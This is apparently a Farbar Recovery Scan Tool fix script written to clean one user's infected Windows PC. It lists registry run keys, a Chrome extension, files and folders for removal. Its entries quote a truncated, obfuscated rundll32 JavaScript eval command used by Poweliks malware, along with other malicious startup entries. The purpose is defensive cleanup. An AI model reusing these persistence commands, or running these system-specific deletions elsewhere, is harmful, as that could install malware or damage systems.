HKU\S-1-5-19\...\RunOnce: [IsMyWinLockerReboot] => msiexec.exe /qn /x{voidguid}
HKU\S-1-5-20\...\RunOnce: [IsMyWinLockerReboot] => msiexec.exe /qn /x{voidguid}
HKU\S-1-5-21-4001245620-4163921732-3684489738-1001\...\Run: [Yftlvkwxrffc] => regsvr32.exe /s "C:\Users\pcrow\AppData\Local\Microsoft\Yftlvkwxrffc.dll" <===== ATTENTION
HKU\S-1-5-21-4001245620-4163921732-3684489738-1001\...\Run: [GoogleUpdate] => C:\Users\pcrow\AppData\Roaming\FrameworkUpdate7\GoogleUpdate.exe [20747520 2014-11-14] ()
HKU\S-1-5-21-4001245620-4163921732-3684489738-1001\...\MountPoints2: {45092f40-94ac-11e2-be69-806e6f6e6963} - "E:\Installer.exe" 
HKU\S-1-5-21-4001245620-4163921732-3684489738-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
HKU\S-1-5-18\...\RunOnce: [IsMyWinLockerReboot] => msiexec.exe /qn /x{voidguid}
Startup: C:\Users\pcrow\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winup.lnk
ShortcutTarget: winup.lnk -> C:\Users\pcrow\AppData\Roaming\Adobe\winup.exe ()
SearchScopes: HKU\S-1-5-21-4001245620-4163921732-3684489738-1001 -> DefaultScope {890DD081-0B40-4192-8A6F-F4AC250895BE} URL = 
SearchScopes: HKU\S-1-5-21-4001245620-4163921732-3684489738-1001 -> {890DD081-0B40-4192-8A6F-F4AC250895BE} URL = 
CHR HKLM-x32\...\Chrome\Extension: [edmgmpmklgfbohogafcfobonnkogchec] - C:\Program Files (x86)\Common Files\Motive\extensions\MotiveRequest.crx [2013-10-02]
2014-11-14 17:24 - 2014-11-19 17:20 - 00000000 _____ () C:\ProgramData\@system.temp
2014-11-14 17:24 - 2014-11-15 13:25 - 00000256 ____H () C:\ProgramData\@system3.att
2014-11-14 17:24 - 2014-11-14 17:24 - 00000480 ____H () C:\Users\pcrow\AppData\Roaming\麽鎒駓覜
2014-11-14 17:24 - 2014-11-14 17:24 - 00000000 ____D () C:\Users\pcrow\AppData\Roaming\FrameworkUpdate7
2014-11-14 17:23 - 2014-11-14 17:23 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
CustomCLSID: HKU\S-1-5-21-4001245620-4163921732-3684489738-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
C:\Users\pcrow\AppData\Local\Microsoft\Yftlvkwxrffc.dll
C:\Users\pcrow\AppData\Roaming\Adobe\winup.exe
C:\ProgramData\Microsoft\PlayReady\Fgadlgfzxf
C:\Users\pcrow\AppData\Roaming\FrameworkUpdate7  
EmptyTemp: 
CMD: bitsadmin /reset /allusers